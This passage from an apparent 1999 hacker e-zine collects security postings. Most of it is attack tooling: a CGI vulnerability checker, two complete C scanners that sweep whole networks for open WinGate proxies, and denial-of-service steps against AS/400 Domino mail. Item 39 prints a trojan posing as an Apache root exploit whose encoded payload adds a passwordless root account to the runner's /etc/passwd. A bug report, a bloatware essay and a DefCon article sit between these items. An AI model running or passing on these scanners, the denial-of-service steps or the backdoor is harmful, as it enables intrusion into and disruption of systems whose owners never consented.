cginame[43] = "uploader.exe ";
cginame[44] = "bdir - samples ";
cginame[45] = "CGImail.exe ";
cginame[46] = "newdsn.exe ";
cginame[47] = "fpcount.exe ";
cginame[48] = "openfile.cfm ";
cginame[49] = "exprcalc.cfm ";
cginame[50] = "dispopenedfile ";
cginame[51] = "sendmail.cfm ";
cginame[52] = "search97.vts ";
cginame[53] = "carbo.dll ";
if (argc<2)
{
printf("\n [-- CGI Checker 1.34. Modified by su1d sh3ll //UnlG --]");
printf("\nusage : %s host <port> ",argv[0]);
printf("\n Or : %s host <port> -d for debug mode\n\n",argv[0]);
exit(0);
}
/* --- seriously rubbish hack, but never mind (codex@bogus.net) */
if(argv[2]) {
if(strstr("-d",argv[2])) {
debugm=1;
}
if(atoi(argv[2])) {
myport=atoi(argv[2]);
} else {
printf("Error: need a valid port\n");
exit(0);
}
}
if(argv[3]) {
if(strstr("-d",argv[3])) {
debugm=1;
}
}
if ((he=gethostbyname(argv[1])) == NULL)
{
herror("gethostbyname");
exit(0);
}
printf("\n\n\t [CKS & Fdisk]'s CGI Checker - modify by su1d sh3ll 04.05.99\n\n\n");
start=inet_addr(argv[1]);
counter=ntohl(start);
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(myport);
if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
{
perror("connect");
}
printf("\n\n\t [ Press any key to check out the httpd version...... ]\n");
getchar(); /* CKS sorry, but ur new piece of code don't work :-( */
send(sock, "HEAD / HTTP/1.0\n\n",17,0);
recv(sock, buffer, sizeof(buffer),0);
printf("%s",buffer);
close(sock);
printf("\n\t [ Press any key to search 4 CGI stuff...... ]\n");
getchar();
while(count++ < 53) /* huh! 53 cgi..... no secur1ty in th1s w0rld ;-)*/
{
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);
if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
{
perror("connect");
}
printf("Searching for %s : ",cginame[count]);
for(numin=0;numin < 1024;numin++)
{
cgibuff[numin] = '\0';
}
send(sock, buff[count],strlen(buff[count]),0);
recv(sock, cgibuff, sizeof(cgibuff),0);
cgistr = strstr(cgibuff,foundmsg);
if( cgistr != NULL)
printf("Found !! ;)\n");
else
printf("Not Found\n");
if(debugm==1)
{
printf("\n\n ------------------------\n %s \n ------------------------\n",cgibuff);
printf("Press any key to continue....\n"); getchar();
}
close(sock);
}
printf("...have a nice hack... ;-)\n");
}
@HWA
34.0 Microsoft Netmeeting Vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Tue, 4 May 1999 13:12:09 -0300
From: Wanderley J. Abreu Junior <storm@UNIKEY.COM.BR>
To: BUGTRAQ@netspace.org
Subject: Microsoft Netmeeting Hole
Since I hadn't any response from Microsoft and a formal
response from CERT i'm putting it here hopping for a helping hand on this
problem.
Version 1.0
October 1996
CERT(sm) Coordination Center
Product Vulnerability Reporting Form
If you know of a vulnerability in a product, please complete
this form and return it to cert@cert.org. We aren't able to
acknowledge each report we receive; however, if we have additional
questions, we will contact you for further information.
We prefer that any vulnerability information you
send to us be encrypted. We can support a shared DES
key or PGP. Contact the CERT staff for more information.
The CERT PGP public key is available in
ftp://info.cert.org/pub/CERT_PGP.key
Thanks, we appreciate your taking the time to report this
vulnerability.
Please describe the vulnerability.
- ---------------------------------
What is the impact of this vulnerability?
- ----------------------------------------
(For example: local user can gain root/privileged access, intruders
can create root-owned files, denial of service attack, etc.)
a) What is the specific impact: Users running MS NetMeeting Version 2.1
(The one that comes
with windows 98) software in a conference can copy/paste the remote
clipboard area.
b) How would you envision it being used in an attack scenario:
With the chat windows OPENED just do a CTRL-C in the box where you
write with nothing in your box and nothing selected at all. then, you
can get
the entire clipboard from the other user in the conference, of
course,
if there's something in his Clipboard (ASCII, Bin, etc).
To your knowledge is the vulnerability currently being exploited?
- ----------------------------------------------------------------
[no]
If there is an exploitation script available, please include it here.
- --------------------------------------------------------------------
Do you know what systems and/or configurations are vulnerable?
- -------------------------------------------------------------
[yes] (If yes, please list them below)
System : Windows 95, 98 and NT
OS version : All Versions
Verified/Guessed: Guessed
Are you aware of any workarounds and/or fixes for this vulnerability?
- --------------------------------------------------------------------
[yes] (If you have a workaround or are aware of patches
please include the information here.)
I'm using PGP to encrypt the clipboard area.
OTHER INFORMATION
===========================================================================
Is there anything else you would like to tell us? Please, send me some
feedback abou this bug
i'm working on a solution but seems NetMeeting to use some sort of Common
Clipboard to build all
the share enviroments. If you ever heard abou this bug, please also let me
know. Thank you.
Best Regards,
Wanderley Junior
@HWA
35.0 IBM AS400+Domino vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Tue, 4 May 1999 08:53:14 +0200
From: Joachim Larsson <joachim.larsson@sigma.se>
To: BUGTRAQ@netspace.org
Subject: AS/400
Hello all.
I played around with smtp on a as/400+domino machine and found two
obvious bugs, then notified IBM, revieved a ptf, then posted here.
1: telnet (host) 25, then start feeding chars. After about 200-300
chars the smtp-subsystem will die, needing to be restarted.
2: change your replyto-address and fromaddress to an non-existing
user/domain then mail to an non-existing user on the 400/domino. This
will cause the mail to loop endlessly between the smtp-subsystem and the
domino subsystem.
This is for general knowledge only, trying to "force" people with
400/domino to react and secure their machines.
Sincerely,
---
(put your favourite signature here)
-----------------------------------------------------------------------------
Date: Wed, 5 May 1999 08:52:42 -0500
From: Ryan Permeh <rrpermeh@RCONNECT.COM>
To: BUGTRAQ@netspace.org
Subject: Re: AS/400
Yeah, i found this a while back on non domino smtp daemons on as400's also.
it's a somewhat simple solution to fix (just turn the SMTP service back
on), but SMTP can be shut off across the network. i know this worked on
as400 3.X, i haven't had a chance to test on any of the domino types or the
4.X OS levels
Ryan
-----------------------------------------------------------------------------
Date: Wed, 5 May 1999 13:34:40 +0200
From: Pavel Ahafonau <paully@IBA.COM.BY>
To: BUGTRAQ@netspace.org
Subject: Re: AS/400
>I played around with smtp on a as/400+domino machine and found two
>obvious bugs, then notified IBM, revieved a ptf, then posted here.
>1: telnet (host) 25, then start feeding chars. After about 200-300
>chars the smtp-subsystem will die, needing to be restarted.
>2: change your replyto-address and fromaddress to an non-existing
>user/domain then mail to an non-existing user on the 400/domino. This
>will cause the mail to loop endlessly between the smtp-subsystem and the
>domino subsystem.
This is good known bug which is not related to AS/400 at all.
This causes to die only Lotus Domino 4.6.1.
I've tried to kill our Lotus Domino 4.6.4 and it still alive ~80)
As for SMTP and Lotus Notes/Domino this is a big problem for it's users
because there no any anti-spam protection like in Sendmail.
Now we are playing with 5th Lotus Domino and there are all this bugs fixed
and anti-spam implemented ~80)
Best regards,
Paully A. Ahafonau.
International Business Alliance (http://www.iba.com.by)
@HWA
36.0 Gateprobe.c Wingate Scanner
~~~~~~~~~~~~~~~~~~~~~~~~~~~
/***************************************
Gateprobe is back...
Version: 2.1 fixed
With lot of news features
Added:
-IP resolving
-Scan class A
-View option
-File save (from misteri0)
-Bug fix and code cleanup
Bong bong26@hotmail.com
PS: Why make a new code for just 3 lines
of code changed, misteri0 ?
****************************************/
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/wait.h>
#include <unistd.h>
#include <signal.h>
#include <stdlib.h>
#include <stdio.h>
#include <netdb.h>
#include <errno.h>
#define SA struct sockaddr
#define SIN_LEN sizeof(struct sockaddr_in)
#define IPV4_ADDRLEN 16
void ShowHelp(char *);
int ConnectCheck(struct sockaddr_in, int),view;
FILE *stream;
char DestIP[15];
const char *ipv4_ntop(int, const void *, char *, size_t);
const char *ipv4_showname(int , const void *, char *, size_t);
int main(int argc, char *argv[]) {
int i,j,k,c,status,Children=128,Timeout=7,class;
char *NetworkID,*num3;
struct sockaddr_in DestAddress;
if(argc < 3) ShowHelp(argv[0]);
NetworkID = argv[1];
num3=argv[2];
class=atoi(num3);
while((c = getopt(argc, argv, "vp:c:t:")) != -1) {
switch(c) {
case 'v': view = 1; break;
case 'c': Children = atoi(optarg); break;
case 't': Timeout = atoi(optarg); break;
}
}
if(Children < 1) ShowHelp(argv[0]);
if(Timeout < 1) ShowHelp(argv[0]);
if(class < 1) ShowHelp(argv[0]);
if (class > 3) ShowHelp(argv[0]);
if (class==1){
fprintf(stderr, "Scanning %s.*.*.*:23 children:%i,timeout:%i\n\n",
NetworkID,Children, Timeout);
for(k = 1; k < 256; k++) {
for(j = 1; j < 256; j++) {
for(i = 1; i < Children; i++) {
sprintf(DestIP, "%s.%d.%d.%d", NetworkID,k,j, i);
inet_aton(DestIP, &DestAddress.sin_addr);
if(!fork()) ConnectCheck(DestAddress, Timeout);
}
for(i = Children + 1; i < 256; i++) {
wait(&status);
sprintf(DestIP, "%s.%d.%d.%d", NetworkID,k,j,i);
inet_aton(DestIP, &DestAddress.sin_addr);
if(!fork()) ConnectCheck(DestAddress, Timeout);
}
}
}
}
if (class==2){
fprintf(stderr, "Scanning %s.*.*:23 children:%i,timeout:%i\n\n",
NetworkID,Children, Timeout);
for(j = 1; j < 256; j++) {
for(i = 1; i < Children; i++) {
sprintf(DestIP, "%s.%d.%d", NetworkID,j,i);
inet_aton(DestIP, &DestAddress.sin_addr);
if(!fork()) ConnectCheck(DestAddress, Timeout);
}
for(i = Children + 1; i < 256; i++) {
wait(&status);
sprintf(DestIP, "%s.%d.%d", NetworkID,j,i);
inet_aton(DestIP, &DestAddress.sin_addr);
if(!fork()) ConnectCheck(DestAddress, Timeout);
}
}
}
if (class==3){
fprintf(stderr, "Scanning %s.*:23 children:%i,timeout:%i\n\n",
NetworkID,Children, Timeout);
DestAddress.sin_family = AF_INET;
DestAddress.sin_port = htons(23);
for(i = 1; i < Children; i++) {
sprintf(DestIP, "%s.%d", NetworkID, i);
inet_aton(DestIP, &DestAddress.sin_addr);
if(!fork()) ConnectCheck(DestAddress, Timeout);
}
for(i = Children + 1; i < 256; i++) {
wait(&status);
sprintf(DestIP, "%s.%d", NetworkID, i);
inet_aton(DestIP, &DestAddress.sin_addr);
if(!fork()) ConnectCheck(DestAddress, Timeout);
}
for(;;) {
if((waitpid(-1, &status, WNOHANG) == -1) && (errno == ECHILD))
exit(EXIT_SUCCESS);
}
}
}
int ConnectCheck(struct sockaddr_in DestAddr, int Timeout)
{
int result,ret,SocketFD;
char Hostname[60],buffer1[64];
if (view==1) printf("%s\n",DestIP);
if((SocketFD = socket(AF_INET, SOCK_STREAM, 0)) < 0) exit(EXIT_FAILURE);
alarm(Timeout);
result = connect(SocketFD, (SA *)&DestAddr, SIN_LEN);
if (!result) {
alarm(Timeout);
memset(buffer1, '\0', 64);
if ((ret = read(SocketFD, buffer1, 64)) > 0)
{
ret = read(SocketFD, buffer1, 64);
if(!(memcmp(buffer1, "WinGate>", 8)) ||
!(memcmp(buffer1, "Too man", 7)))
{
printf("Wingate found: %s\n\a",
ipv4_showname(AF_INET,&DestAddr.sin_addr.s_addr,Hostname,59));
stream = fopen("wingatelist.txt","a");
fprintf(stream,"%s\n",
ipv4_showname(AF_INET,&DestAddr.sin_addr.s_addr,Hostname,59));
fclose(stream);
}}
close(SocketFD);
}
exit(EXIT_SUCCESS);
}
const char *
ipv4_ntop(int family, const void *addrptr, char *strptr, size_t len) {
const u_char *p = (const u_char *)addrptr;
if(family == AF_INET) {
char temp[IPV4_ADDRLEN];
snprintf(temp, sizeof(temp), "%d.%d.%d.%d", p[0], p[1], p[2], p[3]);
if(strlen(temp) >= len) {
return(NULL);
}
strcpy(strptr, temp);
return(strptr);
}
return(NULL);
}
const char *
ipv4_showname(int family, const void *addrptr, char *strptr, size_t len) {
struct hostent *hentry;
size_t aflen;
if(family == AF_INET) aflen = 4;
else {
return(NULL);
}
if((hentry = gethostbyaddr(addrptr, aflen, family)) != NULL) {
if(strlen(hentry->h_name) < len) {
strcpy(strptr, hentry->h_name);
return(strptr);
}
}
return(ipv4_ntop(family, addrptr, strptr, len));
}
void ShowHelp(char *argv0) {
printf("\nBong Wingate scanner 2.1\n");
printf("Usage: %s <network> <class> [option]\n",argv0);
printf("Class: 1 --> A network ID <X> \n");
printf(" 2 --> B network ID <X.X> \n");
printf(" 3 --> C network ID <X.X.X> \n");
printf(" [-c <children>]\tmaximum simultaneous children\n");
printf(" [-t <timeout>] \tseconds before connection timeout\n");
printf(" [-v] \tdebug mode view the IP to scan\n\n");
exit (EXIT_FAILURE);
}
@HWA
37.0 Gatescan20.c Wingate Scanner by Misteri0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/*************************[GateScan20.C]**************************
* Based on the bong's code <-- helped a shitload *
* added... *
* - cleaned the code up a little bit *
* - now logs all wingate servers *
* - added the portscanner *
* [MAJOR PROPS GO TO:] *
* codesearc, ]{ewl, Punk182, Nforcer, bong, S-y-S *
* #ehforce@unet, #c@unet, Sslash, as2r|azz, funkey *
* MAJOR thanx to packet storm security for posting this *
* up. thanx to SIN(Self Induced Negativity member Hogs_head*
* [ANTI PROPS GO TO:[I've got my reasons...]] *
* #fts(2) <-- never really liked them :P *
* #wicked, Ellison, fuCKfaCe (Don't have many enemies...) *
*************************[GateScan20.C]**************************
*/
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/wait.h>
#include <unistd.h>
#include <signal.h>
#include <stdlib.h>
#include <stdio.h>
#include <netdb.h>
#include <errno.h>
#define HIGH_PORT 1024
#define SA struct sockaddr
#define SIN_LEN sizeof(struct sockaddr_in)
#define IPV4_ADDRLEN 16
#define cl "[0m"
#define mag "[35m"
#define cyn "[36m"
#define wht "[37m"
#define hbl "[1;30m"
#define hmag "[1;35m"
#define hcyn "[1;36m"
#define hwh "[1;37m"
void ShowVer();
/* Portscanner */
void portscan(char *the_ip)
{
struct hostent *scand;
struct sockaddr_in scan;
int sck;
int c, portnum;
ShowVer();
printf("Scanning....\n");
for(portnum=1; portnum<HIGH_PORT; portnum++){
if(isdigit(*the_ip)){
scan.sin_addr.s_addr = inet_addr(the_ip);
} else{
scand = gethostbyname(the_ip);
strncpy((char *)&scan.sin_addr, (char *)scand->h_addr, sizeof(scan.sin_addr));
}
scan.sin_family = AF_INET;
scan.sin_port = htons(portnum);
sck = socket(AF_INET, SOCK_STREAM, 0);
if(sck < 0){
printf("Socket cannot be established!\n");
}
c = connect(sck, (struct sockaddr *)&scan, sizeof(scan)); /* connect the socket */
if(c < 0){
} else{
printf("\t [%s]:%d\n",the_ip,portnum);
}
shutdown(sck, 2);
}
close(sck);
}
void ShowHelp(char *, char *);
void ShowVer()
{
fprintf(stderr, "[%sG%sateScan%s.%sC%s[%smisteri0%s%s@%sunet]]\n",cyn,mag,hbl,cyn,cl,hwh,cl,cyn,cl);
}
int ConnectCheck(struct sockaddr_in, int, int);
const char *ipv4_ntop(int, const void *, char *, size_t);
const char *ipv4_showname(int , const void *, char *, size_t);
FILE *stream; /* Declare the Ol' FILE STREAM */
int main(int argc, char *argv[]) {
int i,j=0,status,Children=128,Timeout=7,Resolve=0,class=0;
char DestIP[15],*NetworkID,c,*num3;
struct sockaddr_in DestAddress;
if(atoi(argv[2])==3)
{
portscan(argv[1]);
}
if(argc < 3) ShowHelp(argv[0], "");
NetworkID = argv[1];
num3=argv[2];
class=atoi(num3);
opterr = 0;
while((c = getopt(argc, argv, "Rp:C:t:")) != -1) {
switch(c) {
case 'R': Resolve = -1; break;
case 'C': Children = atoi(optarg); break;
case 't': Timeout = atoi(optarg); break;
case '?': ShowHelp(argv[0], "ERROR: unrecognized option"); break;
}
}
if(Children < 1) ShowHelp(argv[0], "ERROR: invalid number of children");
if(Timeout < 1) ShowHelp(argv[0], "ERROR: invalid timeout");
ShowVer();
if (class==1)
fprintf(stderr, "Scanning %s.*.*:23 children:%i, timeout:%i\n\n",
NetworkID,Children, Timeout);
if (class==2)
fprintf(stderr, "Scanning %s.*:23 children:%i, timeout:%i\n\n",NetworkID, Children, Timeout);
DestAddress.sin_family = AF_INET;
DestAddress.sin_port = htons(23);
if (class==1){
for(j = 0; j < 256; j++) {
for(i = 0; i < Children; i++) {
sprintf(DestIP, "%s.%d.%d", NetworkID,j, i);
inet_aton(DestIP, &DestAddress.sin_addr);
if(!fork()) ConnectCheck(DestAddress, Timeout, Resolve);
}
for(i = Children + 1; i < 256; i++) {
wait(&status); /* wait till a child dies to make another */
sprintf(DestIP, "%s.%d.%d", NetworkID,j, i);
inet_aton(DestIP, &DestAddress.sin_addr);
if(!fork()) ConnectCheck(DestAddress, Timeout, Resolve);
}
}
}
if (class==2){
for(i = 0; i < Children; i++) {
sprintf(DestIP, "%s.%d", NetworkID, i);
inet_aton(DestIP, &DestAddress.sin_addr);
if(!fork()) ConnectCheck(DestAddress, Timeout, Resolve);
}
for(i = Children + 1; i < 256; i++) {
wait(&status); /* wait till a child dies to make another */
sprintf(DestIP, "%s.%d", NetworkID, i);
inet_aton(DestIP, &DestAddress.sin_addr);
if(!fork()) ConnectCheck(DestAddress, Timeout, Resolve);
}
for(;;) {
if((waitpid(-1, &status, WNOHANG) == -1) && (errno == ECHILD))
exit(EXIT_SUCCESS);
}
}
}
int ConnectCheck(struct sockaddr_in DestAddr, int Timeout, int Resolve)
{
int result,ret,SocketFD;
char Hostname[60],buffer1[64];
if((SocketFD = socket(AF_INET, SOCK_STREAM, 0)) < 0) exit (EXIT_FAILURE);
alarm(Timeout);
result = connect(SocketFD, (SA *)&DestAddr, SIN_LEN);
if (!result) {
alarm(Timeout);
memset(buffer1, '\0', 64);
if ((ret = read(SocketFD, buffer1, 64)) > 0)
{
ret = read(SocketFD, buffer1, 64);
if(!(memcmp(buffer1, "WinGate>", 8)) ||
!(memcmp(buffer1, "Too man", 7)))
{
stream = fopen("wingatelist.txt","a");
printf("Wingate found: %s\n\a",ipv4_ntop(AF_INET,&DestAddr.sin_addr.s_addr,Hostname,59));
fprintf(stream,"%s\n",ipv4_ntop(AF_INET,&DestAddr.sin_addr.s_addr,Hostname,59));
fclose(stream);
}}
close(SocketFD);
}
exit(EXIT_SUCCESS);
}
const char *
ipv4_ntop(int family, const void *addrptr, char *strptr, size_t len) {
const u_char *p = (const u_char *)addrptr;
if(family == AF_INET) {
char temp[IPV4_ADDRLEN];
snprintf(temp, sizeof(temp), "%d.%d.%d.%d", p[0], p[1], p[2], p[3]);
if(strlen(temp) >= len) {
errno = ENOSPC;
return(NULL);
}
strcpy(strptr, temp);
return(strptr);
}
errno = EAFNOSUPPORT;
return(NULL);
}
const char *
ipv4_showname(int family, const void *addrptr, char *strptr, size_t len) {
struct hostent *hentry;
size_t aflen;
if(family == AF_INET) aflen = 4;
else {
errno = EAFNOSUPPORT;
return(NULL);
}
if((hentry = gethostbyaddr(addrptr, aflen, family)) != NULL) {
if(strlen(hentry->h_name) < len) {
strcpy(strptr, hentry->h_name);
return(strptr);
}
}
return(ipv4_ntop(family, addrptr, strptr, len));
}
void ShowHelp(char *argv0, char *ErrMsg) {
ShowVer();
printf("v2.0 now includes intergrated portscanner\n");
printf("Based bong's <bong26@hotmail.com> code\n");
printf("Output of wingate servers will be written in wingatelist.txt\n");
printf("Usage: %s <network> <class> [option]\n",argv0);
printf(" class: 1 class b network ID <x.x> \n");
printf(" 2 class c network ID <x.x.x>\n");
printf(" 3 portscan the host...\n");
printf(" [-C <children>]\tmaximum simultaneous children\n");
printf(" [-t <timeout>] \tseconds before connection timeout\n\n");
exit (EXIT_FAILURE);
}
@HWA
38.0 The BloatWare Debate
~~~~~~~~~~~~~~~~~~~~
Date: Sun, 02 May 1999 16:12:13 +0000
>From: main@radsoft.net (RA Downes)
Subject: Re: Bloatware Debate (Downes, RISKS-20.35)
A certain "Johnny" has written to me from Microsoft because of my posting in
RISKS-20.35 about MS bloat. The tone was a thinly disguised threat. In his
opening, "Johnny" stated that the "bloat" of MS RegClean was due no doubt to
having static links. Discussing the sweeping ramifications of such a
statement is unnecessary here. The mind boggles, it is sufficient to
state. The MSVC runtime is a mere 250,000 bytes and in fact is not
statically linked anyway to MS RegClean, AFAIK [as far as I know]. MS
RegClean is an MFC app and will by default use the dynamically linked MFC
libraries. And even if its static code links were an overhead here they
would add but a small fraction of the total bloat, say 40KB at most.
For whatever reason, I decided to download the latest version of MS RegClean
>from BHS again and pluck it apart. This is what I found. I have tried - and
it has been difficult - to keep subjective comments out of this report.
Current Status of RegClean Version 4.1a Build 7364.1
====================================================
Image Size (Unzipped and ready to run): 837,632 bytes (818KB)
=============================================================
(Subjective comment removed.)
Import Tables
=============
The import section in the PE header. This gives an indication of just
how (in)effective the use of Bjarne's C++ has been. In this case, the
verdict is: "pretty horrible". A walloping 7,680 bytes are used for the
names of the relocatable Win32 imports. These are the actual names of
the functions (supposedly) called. MS RegClean does not call most of
these functions - they remain because an MFC template was originally
used, most likely borrowed from another application, and it was never
"cleaned". This is corroborated by what is found among the "Windows
resources": over half a dozen standard menus, assorted graphic images,
print preview resources, etc. that have nothing to do with the
application at hand.
Resources
=========
Please understand that resources not only bloat an executable with their
own size, but with additional reference data, in other words the bloat
factor of an unused or bad resource is always somewhat larger than the
size of the bloating resource itself.
Accelerators
============
Sixteen (16) unused accelerators from an MFC template were found: Copy,
New, Open, Print, Save, Paste, "Old Undo", "Old Cut", Help, Context
Help, "Old Copy", "Old Insert", Cut, Undo, Page Up, Page Down. MS
RegClean uses only one accelerator itself, not listed here.
Bitmaps
=======
This was a particularly sorry lot. The main bloat here was a splash
screen bitmap weighing in (no RLE compression of course) at over 150KB.
Further, Ctl32 static library bitmaps were found, meaning MS RegClean is
still linking with the old Ctl32v2 static library which was obsolete
five years ago and which automatically adds another 41KB to the image
size.
Cursors
=======
Six (6) cursors were found, none of which have anything to do with this
application.
Dialogs
=======
A very messy chapter indeed. MS RegClean walks around with eighteen (18)
hidden dialogs, of which only one or at the most two are ever used. The
others are just - you took the words out of my mouth - junk. The
findings (read it and weep):
*) Eleven (11) empty dialogs with the caption "My Page" and the static
text "Todo", all identical, all empty, and of course all unused. This is
a wonder in and of itself.
*) The main "wizard" dialog actually used by the application is left
with comment fields to help the programmers reference the right controls
in their code (subjective comment removed).
*) A "RegClean Options" dialog which AFAIK is never used.
*) A "New (Resource)" dialog, probably a part of the development
process, just stuffed in the stomach at sew-up time and left there for
posterity.
*) A "Printing in Progress" dialog.
*) A "Print Preview" control bar dialog.
Icons
=====
MS RegClean has three icons, all with images of 48x48 in 256 colors (of
course). The funniest thing here is that the authors of MS RegClean have
extracted the default desktop icon from shell32.dll, which is available
at runtime as a resident resource anyway and at no image bloat overhead
at all, and included it in toto in their executable.
Menus
=====
MS RegClean has eight (8) menus, at least half of these are simply junk
left around by the MFC template. Another menu indicates that the authors
of RegClean have in fact worked from an internal Microsoft Registry tool
- rather bloated in itself it seems.
String Table(s)
===============
Actually it need only be one string table, but Microsoft itself has
never learned this. The findings here were atrocious. And you must
remember that strings stored in a string table are stored in Unicode,
which means that their bloat automatically doubles. Further, MS's way of
indexing strings in a string table means a 512 byte header block must be
created for every string grouping, and strings are grouped according to
the high 12 bits of their numerical identifiers (yes they are 16-bit
WORD identifiers). Meaning indiscriminate or random numbering of string
table entries will make an otherwise innocent application literally
explode.
347 (three hundred forty seven, yep, your video driver is not playing
tricks on you) string table entries were found in MS RegClean, including
16 identical string entries with the MS classic "Open this document" as
well as archaic MFC template toggle keys texts which are not used here
(or almost anywhere else today). Most of these strings have - of course
- nothing to do with the application at hand.
Toolbars
========
Toolbars are a funny MS way of looking at glyph bitmaps for use in
toolbar controls. MS RegClean has two - one which may be used by the
application, and one which was part of the original MFC template and
never removed.
Total Accountable Resource Bloat
================================
The total accountable (i.e. what can be directly calculated at this
stage) resource bloat of MS RegClean 4.1a Build 7364.1 is over 360,000
bytes (350KB).
Total Accountable Code Bloat
============================
Harder to estimate, but considering that most of the code is never used,
only part of an MFC template that the authors of MS RegClean lack the
wherewithal to remove, the original estimate of a total necessary image
size of 45KB for the entire application must still stand.
In Conclusion
=============
Bloat is not a technical issue, but verily a way of thinking, a "state
of mind". Its cure is a simple refusal to accept, and a well directed,
resounding "clean up your act and clean up your code!"
PS. Send feedback on RegClean to regclean@microsoft.com
RA Downes, Radsoft Laboratories http://www.radsoft.net
------------------------------
Date: Mon, 03 May 1999 01:46:36 +0000
>From: main@radsoft.net (RA Downes)
Subject: Re: Bloatware Debate
Bloatware is something we are very sensitized to here. The way we see it,
there is no excuse, because there is no reason.
I personally accepted Brian W. Kernighan's calculations back in the old days
about a 10% bloat with C versus assembler because the rewards were tangible
and far outweighed the bloat: you got largely (according to Steve Johnson
94%) platform independent code, saving countless man-hours of work.
But ever since the popular inception of MS Windows and furthermore MS's MFC
things have been way out of control. This is partly due to C++ and partly,
if not largely, due to MS and their MFC itself. A typical Win16 application
was 5KB, yet the same skeleton if built with the MFC back then was ten times
that size. And Bjarne's words echoed in your ear: "C++ produces no
noticeable overhead versus C." It simply was not so, and never will be so.
With time the MFC overhead has been reduced somewhat, but programmers of
today, raised on OO and C++ as opposed to what others have gone through,
are simply not taught to be conservative and minimalistic.
I received a letter yesterday from someone who had been reading the Risks
Digest, and reported on a party he had attended some years earlier. The
conversation turned inevitably toward software, and he mentioned that he
often must really tweak code to get it compact and fast. Another person at
the party, from you guessed it Redmond Washington, said that was *not* the
way things were done there; she said that if they ever ran into performance
problems, they just "threw more hardware at it."
So there are several issues involved all at once, and AFAIK the only way to
fight this, for stop it we must, is to expose it and make even ordinary end
users understand what it's all about, and perhaps by a concerted effort we
can turn back the tide.
Rick Downes, Radsoft Laboratories http://www.radsoft.net
------------------------------
From Risks Digest 20.37
http://catless.ncl.ac.uk/Risks/20.37.html
ftp.sri.com/risks/
@HWA
39.0 apache.c claims to be a root exploit but actually creates a shell on your box
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Burn a script kiddie;
/* remote apache 1.3.4 root exploit (linux) */
#include <stdio.h>
#include <netdb.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
char shellcode[] = \
"\x65\x63\x68\x6f\x20\x68\x61\x6b\x72\x3a\x3a\x30\x3a"
"\x30\x3a\x3a\x2f\x3a\x2f\x62\x69\x6e\x2f\x73\x68\x20"
"\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";
#define NOP 0x90
#define BSIZE 256
#define OFFSET 400
#define ADDR 0xbffff658
#define ASIZE 2000
int
main(int argc, char *argv[])
{
char *buffer;
int s;
struct hostent *hp;
struct sockaddr_in sin;
if (argc != 2) {
printf("%s <target>\n", argv[0]);
exit(1);
}
buffer = (char *) malloc(BSIZE + ASIZE + 100);
if (buffer == NULL) {
printf("Not enough memory\n");
exit(1);
}
memcpy(&buffer[BSIZE - strlen(shellcode)], shellcode,
strlen(shellcode));
buffer[BSIZE + ASIZE] = ';';
buffer[BSIZE + ASIZE + 1] = '\0';
hp = gethostbyname(argv[1]);
if (hp == NULL) {
printf("no such server\n");
exit(1);
}
bzero(&sin, sizeof(sin));
bcopy(hp->h_addr, (char *)&sin.sin_addr, hp->h_length);
sin.sin_family = AF_INET;
sin.sin_port = htons(80);
s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (s < 0) {
printf("Can't open socket\n");
exit(1);
}
if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
printf("Connection refused\n");
exit(1);
}
printf("sending exploit code...\n");
if (send(s, buffer, strlen(buffer), 0) != 1)
printf("exploit was successful!\n");
else
printf("sorry, this site isn't vulnerable\n");
printf("waiting for shell.....\n");
if (fork() == 0)
execl("/bin/sh", "sh", "-c", shellcode, 0);
else
wait(NULL);
while (1) { /* shell */ }
}
@HWA
40.0 Cyber-Christ meets Lady Luck. Winn Schwartau in Las Vegas (DefCon II)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Snarfed from PacketStorm Security http://www.genocide2600.com/~tattooman/new.shtml
DefCon II: Las Vegas
Cyber-Christ meets Lady Luck
July 22-24, 1994
by Winn Schwartau
Las Vegas connotes radically different images to radically different folks. The Rat Pack of
Sinatra, Dean Martin and Sammy Davis Jr. elicits up the glistening self-indulgent imagery of
Vegas' neon organized crime in the '50's (Ocean's Eleven displayed only minor hacking skills.)
Then there's the daily bus loads of elderly nickel slot gamblers from Los Angeles and Palm
Springs who have nothing better to do for twenty out of twenty four hours each day. (Their
dead hus bands were golf hacks.) Midwesterners now throng to the Mississippi River for cheap
gambling.
Recreational vehicles of semi-trailor length from East Bullock, Montana and Euclid, Oklahoma
and Benign, Ohio clog routes 80 and 40 and 10 to descend with a vengeance upon an asphalt
home away from home in the parking lot of Circus Circus. By cultural demand, every Rv'er
worth his salt must, at least once in his life, indulge in the depravity of Glitter Gulch.
And so they come, compelled by the invisibly insidious derelict attraction of a desert Mecca
whose only purpose in life is to suck the available cash from addicted visitor's electronic purses of
ATM and VISA cards. (Hacker? Nah . . .)
Vegas also has the distinction of being home to the largest of the largest conventions and
exhibitions in the world. Comdex is the world's largest computer convention where 150,000
techno- dweebs and silk suited glib techno-marketers display their wares to a public who is still
paying off the 20% per annum debt on last year's greatest new electronic gismo which is now
rendered thoroughly obsolete. And the Vegas Consumer Electronic Show does for consumer
electronics what the First Amendment does for pornography. (Hackers, are we getting close?)
In between, hundreds upon hundreds of small conferences and conventions and sales
meetings and annual excuses for excess all select Las Vegas as the ultimate host city. Whatever
